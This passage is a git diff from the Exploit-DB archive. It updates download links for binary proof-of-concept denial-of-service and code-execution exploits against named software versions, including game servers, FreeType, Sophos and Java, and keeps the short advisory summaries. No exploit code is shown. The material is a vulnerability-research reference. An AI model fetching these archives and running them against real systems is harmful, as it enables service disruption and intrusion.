\ No newline at end of file diff --git a/exploits/multiple/dos/24793.txt b/exploits/multiple/dos/24793.txt index 0577f8f2e..d707aebd9 100644 --- a/exploits/multiple/dos/24793.txt +++ b/exploits/multiple/dos/24793.txt @@ -8,4 +8,4 @@ The first issue presents itself when malformed HTTP requests are made to the aff An attacker may leverage these issues to cause the affected proxy server to hang, effectively denying service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24793.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24793.zip \ No newline at end of file diff --git a/exploits/multiple/dos/24807.txt b/exploits/multiple/dos/24807.txt index 6469280c5..4bc449a24 100644 --- a/exploits/multiple/dos/24807.txt +++ b/exploits/multiple/dos/24807.txt @@ -10,4 +10,4 @@ At this time, preimage attacks are not reportedly possible. It is recommended that cryptosystems that utilize the MD5 algorithm should be reviewed, and the measures should be taken to protect against this weakness. Other hashing algorithms may possibly be utilized in replacement to, or in conjunction with MD5 to decrease the likelihood of a successful attack. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24807.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24807.tar.gz \ No newline at end of file diff --git a/exploits/multiple/dos/24818.txt b/exploits/multiple/dos/24818.txt index b29b7cd74..814fc38f9 100644 --- a/exploits/multiple/dos/24818.txt +++ b/exploits/multiple/dos/24818.txt @@ -4,4 +4,4 @@ A remote denial of service vulnerability reportedly affects Digital Illusions CE An attacker may leverage this issue to cause the affected application to stop responding to network-based messages, effectively denying service to legitimate, remote users. Due to the nature of the network protocol used by the affected application an attacker may spoof their network identity, facilitating anonymous exploitation. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24818.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24818.zip \ No newline at end of file diff --git a/exploits/multiple/dos/25081.txt b/exploits/multiple/dos/25081.txt index 596739350..f42ae7570 100644 --- a/exploits/multiple/dos/25081.txt +++ b/exploits/multiple/dos/25081.txt @@ -4,4 +4,4 @@ LANChat Pro Revival is reported prone to a remote denial of service vulnerabilit A remote attacker may exploit this vulnerability to crash the affected application effectively denying service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25081.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25081.zip \ No newline at end of file diff --git a/exploits/multiple/dos/25171.txt b/exploits/multiple/dos/25171.txt index 93b84da32..b6d0e0b05 100644 --- a/exploits/multiple/dos/25171.txt +++ b/exploits/multiple/dos/25171.txt @@ -6,4 +6,4 @@ It is reported that the game server crashes when handling various errors. Scrapland 1.0 and prior versions are affected by these issues. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25171.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25171.zip \ No newline at end of file diff --git a/exploits/multiple/dos/25387.txt b/exploits/multiple/dos/25387.txt index 337ed129b..203e774bb 100644 --- a/exploits/multiple/dos/25387.txt +++ b/exploits/multiple/dos/25387.txt @@ -22,4 +22,4 @@ A remote attacker may exploit this issue to degrade the performance of TCP conne **Update: Microsoft platforms are also reported prone to these issues. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25387.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25387.tar.gz \ No newline at end of file diff --git a/exploits/multiple/dos/25388.txt b/exploits/multiple/dos/25388.txt index b09b30c92..6684bcb94 100644 --- a/exploits/multiple/dos/25388.txt +++ b/exploits/multiple/dos/25388.txt @@ -22,4 +22,4 @@ A remote attacker may exploit this issue to degrade the performance of TCP conne **Update: Microsoft platforms are also reported prone to these issues. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25388.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25388.tar.gz \ No newline at end of file diff --git a/exploits/multiple/dos/25389.txt b/exploits/multiple/dos/25389.txt index 09bc9139f..c1756213e 100644 --- a/exploits/multiple/dos/25389.txt +++ b/exploits/multiple/dos/25389.txt @@ -22,4 +22,4 @@ A remote attacker may exploit this issue to degrade the performance of TCP conne **Update: Microsoft platforms are also reported prone to these issues. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25389.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25389.tar.gz \ No newline at end of file diff --git a/exploits/multiple/dos/25584.txt b/exploits/multiple/dos/25584.txt index 4f382089f..4536e4f18 100644 --- a/exploits/multiple/dos/25584.txt +++ b/exploits/multiple/dos/25584.txt @@ -4,4 +4,4 @@ The Mtp-Target server is prone to a memory corruption vulnerability. The issue e Immediate consequences of exploitation of this vulnerability are a denial of service. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25584.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25584.zip \ No newline at end of file diff --git a/exploits/multiple/dos/25692.txt b/exploits/multiple/dos/25692.txt index 8d455152e..aa3801756 100644 --- a/exploits/multiple/dos/25692.txt +++ b/exploits/multiple/dos/25692.txt @@ -4,4 +4,4 @@ Warrior Kings: Battles is susceptible to a remote denial of service vulnerabilit This vulnerability allows remote attackers to crash affected game servers, denying access to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25692.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25692.zip \ No newline at end of file diff --git a/exploits/multiple/dos/25757.txt b/exploits/multiple/dos/25757.txt index 4faa6e9db..09ed15fb6 100644 --- a/exploits/multiple/dos/25757.txt +++ b/exploits/multiple/dos/25757.txt @@ -6,4 +6,4 @@ The issue arises when the game server handles a specially crafted packet. Stronghold 2 1.2 and prior versions are affected by this vulnerability. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25757.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25757.zip \ No newline at end of file diff --git a/exploits/multiple/dos/25791.txt b/exploits/multiple/dos/25791.txt index 0c6af2116..b61e6bd47 100644 --- a/exploits/multiple/dos/25791.txt +++ b/exploits/multiple/dos/25791.txt @@ -6,4 +6,4 @@ Reportedly, the vulnerability presents itself when the library handles an empty RakNet 2.33 and prior versions released before May 30, 2005 are affected by this vulnerability. Various games employing the affected library may be vulnerable as well. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25791.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25791.zip \ No newline at end of file diff --git a/exploits/multiple/dos/2587.txt b/exploits/multiple/dos/2587.txt index c84208679..b6f99bdd2 100644 --- a/exploits/multiple/dos/2587.txt +++ b/exploits/multiple/dos/2587.txt @@ -3,6 +3,6 @@ Damian Put pucik[at]gazeta.pl pucik[@]overflow.pl http://overflow.pl -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/2587.exe.bz2 (10172006-clam_petite_heap.exe.bz2 +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/2587.exe.bz2 (10172006-clam_petite_heap.exe.bz2 # milw0rm.com [2006-10-17] \ No newline at end of file diff --git a/exploits/multiple/dos/27108.txt b/exploits/multiple/dos/27108.txt index e94575e2f..dca095883 100644 --- a/exploits/multiple/dos/27108.txt +++ b/exploits/multiple/dos/27108.txt @@ -8,4 +8,4 @@ Successful exploitation can allow attackers to trigger a denial of service condi Dual DHCP DNS Server 1.0 is reported to be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/27108.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27108.zip \ No newline at end of file diff --git a/exploits/multiple/dos/27140.txt b/exploits/multiple/dos/27140.txt index 151d60156..6a794c07d 100644 --- a/exploits/multiple/dos/27140.txt +++ b/exploits/multiple/dos/27140.txt @@ -6,4 +6,4 @@ This issue allows attackers to crash applications that use the affected library This issue is present in Exiv2 versions prior to 0.9. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/27140.jpg \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27140.jpg \ No newline at end of file diff --git a/exploits/multiple/dos/27365.txt b/exploits/multiple/dos/27365.txt index d10e7bd90..842056773 100644 --- a/exploits/multiple/dos/27365.txt +++ b/exploits/multiple/dos/27365.txt @@ -4,4 +4,4 @@ The Monopd game server is prone to a remote denial-of-service vulnerability. A remote attacker may exploit this issue to deny service for legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/27365.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27365.zip \ No newline at end of file diff --git a/exploits/multiple/dos/27547.txt b/exploits/multiple/dos/27547.txt index 5b3ea8147..c40d01c23 100644 --- a/exploits/multiple/dos/27547.txt +++ b/exploits/multiple/dos/27547.txt @@ -9,4 +9,4 @@ A remote denial of service condition also affects the server. ZDaemon 1.08.01 and prior versions are affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/27547.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27547.zip \ No newline at end of file diff --git a/exploits/multiple/dos/27993.txt b/exploits/multiple/dos/27993.txt index f93aa163f..d3deb400b 100644 --- a/exploits/multiple/dos/27993.txt +++ b/exploits/multiple/dos/27993.txt @@ -6,4 +6,4 @@ This issue allows remote attackers to crash applications that use the affected l FreeType versions prior to 2.2.1 are vulnerable to this issue. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/27993.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27993.zip \ No newline at end of file diff --git a/exploits/multiple/dos/28345.txt b/exploits/multiple/dos/28345.txt index ca726b64f..345154ccc 100644 --- a/exploits/multiple/dos/28345.txt +++ b/exploits/multiple/dos/28345.txt @@ -8,4 +8,4 @@ An attacker can exploit this issue to crash the server, causing a denial-of-serv Version 0.7.0, CVS July 30th 2006 and prior versions are vulnerable to this issue. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28345.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28345.zip \ No newline at end of file diff --git a/exploits/multiple/dos/28666.txt b/exploits/multiple/dos/28666.txt index 5fe508508..84c76c6a4 100644 --- a/exploits/multiple/dos/28666.txt +++ b/exploits/multiple/dos/28666.txt @@ -4,4 +4,4 @@ Call of Duty server is prone to a remote buffer-overflow vulnerability because i Exploiting this issue may allow remote attackers to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28666.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28666.zip \ No newline at end of file diff --git a/exploits/multiple/dos/2910.txt b/exploits/multiple/dos/2910.txt index ba5cafa09..091281992 100644 --- a/exploits/multiple/dos/2910.txt +++ b/exploits/multiple/dos/2910.txt @@ -1,5 +1,5 @@ Sophos Antivirus CHM File Heap Overflow Vulnerability -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/2910.chm (12092006-sophos_chunkheap.chm) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/2910.chm (12092006-sophos_chunkheap.chm) # milw0rm.com [2006-12-10] \ No newline at end of file diff --git a/exploits/multiple/dos/2911.txt b/exploits/multiple/dos/2911.txt index 42b45e747..df1fc54b1 100644 --- a/exploits/multiple/dos/2911.txt +++ b/exploits/multiple/dos/2911.txt @@ -1,5 +1,5 @@ Sophos Antivirus CHM Chunk Name Length Memory Corruption Vulnerability -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/2911.chm (12092006-sophos_namelen.chm) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/2911.chm (12092006-sophos_namelen.chm) # milw0rm.com [2006-12-10] \ No newline at end of file diff --git a/exploits/multiple/dos/2912.txt b/exploits/multiple/dos/2912.txt index 7baca5299..40152540b 100644 --- a/exploits/multiple/dos/2912.txt +++ b/exploits/multiple/dos/2912.txt @@ -1,5 +1,5 @@ Multiple Vendor Antivirus RAR File Denial of Service Vulnerability -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/2912.rar (12102006-sophos_intifiniti.rar) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/2912.rar (12102006-sophos_intifiniti.rar) # milw0rm.com [2006-12-10] \ No newline at end of file diff --git a/exploits/multiple/dos/30498.txt b/exploits/multiple/dos/30498.txt index 5117209cc..238df7dd7 100644 --- a/exploits/multiple/dos/30498.txt +++ b/exploits/multiple/dos/30498.txt @@ -4,4 +4,4 @@ Live For Speed is prone to four vulnerabilities, including buffer-overflow and d Successful exploits could allow attackers to execute arbitrary code or to crash game servers. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30498.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30498.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30513.txt b/exploits/multiple/dos/30513.txt index 2a5bea438..ca459939a 100644 --- a/exploits/multiple/dos/30513.txt +++ b/exploits/multiple/dos/30513.txt @@ -8,5 +8,5 @@ Versions of Unreal Engine that are included in Unreal Tournament 2003 and 2004 a This vulnerability also affects America's Army 2.8.2 when Punkbuster is enabled on the local server; other versions may also be vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30513-1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30513-2.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30513-1.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30513-2.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30519.txt b/exploits/multiple/dos/30519.txt index 81c8eaed0..65cb67551 100644 --- a/exploits/multiple/dos/30519.txt +++ b/exploits/multiple/dos/30519.txt @@ -4,4 +4,4 @@ Asura Engine is prone to a remote stack-based buffer-overflow vulnerability beca An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30519.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30519.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30524.txt b/exploits/multiple/dos/30524.txt index d70e46df5..d26b56f88 100644 --- a/exploits/multiple/dos/30524.txt +++ b/exploits/multiple/dos/30524.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues allows remote attackers to crash game serve Soldat 1.4.2 and Soldat dedicated server 2.6.2 are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30524.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30524.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30529.txt b/exploits/multiple/dos/30529.txt index 2e57dd971..51058a89b 100644 --- a/exploits/multiple/dos/30529.txt +++ b/exploits/multiple/dos/30529.txt @@ -8,4 +8,4 @@ Successfully exploiting this issue allows remote attackers to execute arbitrary Media Player Classic 6.4.9.0 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30529.fli \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30529.fli \ No newline at end of file diff --git a/exploits/multiple/dos/30540.txt b/exploits/multiple/dos/30540.txt index c4b25caea..ea991617d 100644 --- a/exploits/multiple/dos/30540.txt +++ b/exploits/multiple/dos/30540.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to crash the affected application, denying serv This issue affects StarCraft Brood War 1.15.1; prior versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30540.scm \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30540.scm \ No newline at end of file diff --git a/exploits/multiple/dos/30566.txt b/exploits/multiple/dos/30566.txt index c67db6acd..8cc61ff6c 100644 --- a/exploits/multiple/dos/30566.txt +++ b/exploits/multiple/dos/30566.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues will allow an attacker to execute arbitrary Alien Arena 2007 6.10 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30566.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30566.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30574.txt b/exploits/multiple/dos/30574.txt index df6c65cd4..38c0f9b2c 100644 --- a/exploits/multiple/dos/30574.txt +++ b/exploits/multiple/dos/30574.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues will allow an attacker to execute arbitrary CellFactor: Revolution 1.03 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30574.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30574.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30779.txt b/exploits/multiple/dos/30779.txt index 81c16733f..2bd50f887 100644 --- a/exploits/multiple/dos/30779.txt +++ b/exploits/multiple/dos/30779.txt @@ -6,4 +6,4 @@ An attacker could exploit this issue to execute arbitrary code within the contex This issue affects Rigs of Rods 0.33d and prior versions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30779.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30779.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30791.txt b/exploits/multiple/dos/30791.txt index a8bd1a059..24919b6b5 100644 --- a/exploits/multiple/dos/30791.txt +++ b/exploits/multiple/dos/30791.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to cause a remote denial-of-service condit These issues affect versions prior to I Hear U 0.5.7. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30791.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30791.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30856.txt b/exploits/multiple/dos/30856.txt index 1806e6cf7..cb2b2f23e 100644 --- a/exploits/multiple/dos/30856.txt +++ b/exploits/multiple/dos/30856.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues allows remote attackers to upload files to Easy File Sharing Web Server 4.5 is vulnerable to these issues; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30856.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30856.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30943.txt b/exploits/multiple/dos/30943.txt index d4b9267b0..076161ceb 100644 --- a/exploits/multiple/dos/30943.txt +++ b/exploits/multiple/dos/30943.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to execute arbitrary code in the context of a Libnemesi 0.6.4-rc1 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30943.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30943.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30989.txt b/exploits/multiple/dos/30989.txt index 84c9185ee..c093bd43b 100644 --- a/exploits/multiple/dos/30989.txt +++ b/exploits/multiple/dos/30989.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to exhaust the maximum number of connections al FortressSSH 5.0 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30989.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30989.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30990.txt b/exploits/multiple/dos/30990.txt index fd281dd36..ed5f23d8e 100644 --- a/exploits/multiple/dos/30990.txt +++ b/exploits/multiple/dos/30990.txt @@ -6,5 +6,5 @@ An attacker can exploit this issue to crash the affected application, denying se This issue affects Foxit WAC Server 2.0 Build 3503 and prior versions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30990-1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30990-2.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30990-1.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30990-2.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30991.txt b/exploits/multiple/dos/30991.txt index 031a0259e..a9b63249f 100644 --- a/exploits/multiple/dos/30991.txt +++ b/exploits/multiple/dos/30991.txt @@ -6,4 +6,4 @@ Attackers can leverage this issue to terminate the server and cause denial-of-se This issue affects Pragma TelnetServer 7.0 Build 4 Revision 589; other versions may also be vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30991.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30991.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31136.txt b/exploits/multiple/dos/31136.txt index 104fe7100..e514c2526 100644 --- a/exploits/multiple/dos/31136.txt +++ b/exploits/multiple/dos/31136.txt @@ -15,4 +15,4 @@ cyanPrintIP Workstation 4.10.836 and prior cyanPrintIP Standard 4.10.940 and prior cyanPrintIP Basic 4.10.1030 and prior -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31136.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31136.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31148.txt b/exploits/multiple/dos/31148.txt index 0787f58ec..b5c26ceef 100644 --- a/exploits/multiple/dos/31148.txt +++ b/exploits/multiple/dos/31148.txt @@ -13,4 +13,4 @@ cyanPrintIP Workstation 4.10.936 and prior cyanPrintIP Standard 4.10.940 and prior cyanPrintIP Basic 4.10.1030 and prior -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31148.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31148.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31150.txt b/exploits/multiple/dos/31150.txt index 935fb5ed6..c9a7431c5 100644 --- a/exploits/multiple/dos/31150.txt +++ b/exploits/multiple/dos/31150.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue to execute arbitrary code or cause denial-of- The issue affects RPM Elite and Select 4.5.1.11 and prior versions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31150.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31150.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31232.txt b/exploits/multiple/dos/31232.txt index c2a775b9a..9c13d6342 100644 --- a/exploits/multiple/dos/31232.txt +++ b/exploits/multiple/dos/31232.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue may allow remote attackers to execute arbitra This issue affects WAC Server 2.0 Build 3503 and prior versions. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31232.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31232.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31271.txt b/exploits/multiple/dos/31271.txt index 656229632..68a0d3b8a 100644 --- a/exploits/multiple/dos/31271.txt +++ b/exploits/multiple/dos/31271.txt @@ -6,4 +6,4 @@ A successful exploit will allow remote attackers to execute arbitrary code in th These issues affect MobiLink 10.0.1.3629; prior versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31271.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31271.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31285.txt b/exploits/multiple/dos/31285.txt index dd7c69b17..79d2e88e4 100644 --- a/exploits/multiple/dos/31285.txt +++ b/exploits/multiple/dos/31285.txt @@ -6,4 +6,4 @@ A successful exploit may allow remote attackers to execute arbitrary code in the These issues affect ZIM Server 2.0 and 2.1; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31285.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31285.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31327.txt b/exploits/multiple/dos/31327.txt index 8fc6f1119..7729067a8 100644 --- a/exploits/multiple/dos/31327.txt +++ b/exploits/multiple/dos/31327.txt @@ -8,5 +8,5 @@ NOTE: The StarTeam MPX vulnerabilities may actually be related to a TIBCO SmartS Borland StarTeam Server 2008 and MPX products are vulnerable to these issues; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31327-1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31327-2.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31327-1.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31327-2.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31343.txt b/exploits/multiple/dos/31343.txt index 88f0eb4b3..e1d08cece 100644 --- a/exploits/multiple/dos/31343.txt +++ b/exploits/multiple/dos/31343.txt @@ -13,4 +13,4 @@ SDK and JRE prior to 1.3.1_22 This vulnerability was previously covered in BID 28083 (Sun Java SE Multiple Security Vulnerabilities), but has been given its own record to better document the issue. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31343.jpg \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31343.jpg \ No newline at end of file diff --git a/exploits/multiple/dos/31542.txt b/exploits/multiple/dos/31542.txt index 9a7dedec5..7eaadb4e7 100644 --- a/exploits/multiple/dos/31542.txt +++ b/exploits/multiple/dos/31542.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to execute arbitrary code or to deny service solidDB 06.00.1018 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31542.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31542.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31728.txt b/exploits/multiple/dos/31728.txt index 08b4351db..18dbf73f1 100644 --- a/exploits/multiple/dos/31728.txt +++ b/exploits/multiple/dos/31728.txt @@ -6,6 +6,6 @@ An attacker can exploit this issue to crash the affected application, denying se Call of Duty 4 1.5 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31728-1.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31728-1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31728-2.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31728-2.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31932.txt b/exploits/multiple/dos/31932.txt index 68e82494c..fb6fe78e7 100644 --- a/exploits/multiple/dos/31932.txt +++ b/exploits/multiple/dos/31932.txt @@ -6,4 +6,4 @@ A successful attack will deny service to legitimate users. Skulltag 0.97d2-RC3 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31932.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31932.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31957.txt b/exploits/multiple/dos/31957.txt index d3c4ca1f1..bf988ee9f 100644 --- a/exploits/multiple/dos/31957.txt +++ b/exploits/multiple/dos/31957.txt @@ -6,4 +6,4 @@ An attacker could exploit this issue to crash the affected application, denying This issue affects World in Conflict 1.008; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31957.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31957.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31958.txt b/exploits/multiple/dos/31958.txt index f1a86ae5c..6f3f3762f 100644 --- a/exploits/multiple/dos/31958.txt +++ b/exploits/multiple/dos/31958.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues allows remote attackers to crash affected g SunAge 1.08.1 is vulnerable; previous versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31958.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31958.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31998.txt b/exploits/multiple/dos/31998.txt index 2f5731f50..392576914 100644 --- a/exploits/multiple/dos/31998.txt +++ b/exploits/multiple/dos/31998.txt @@ -10,4 +10,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex S.T.A.L.K.E.R Shadow of Chernobyl 1.0006 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31998.zip \ No newline at end of file 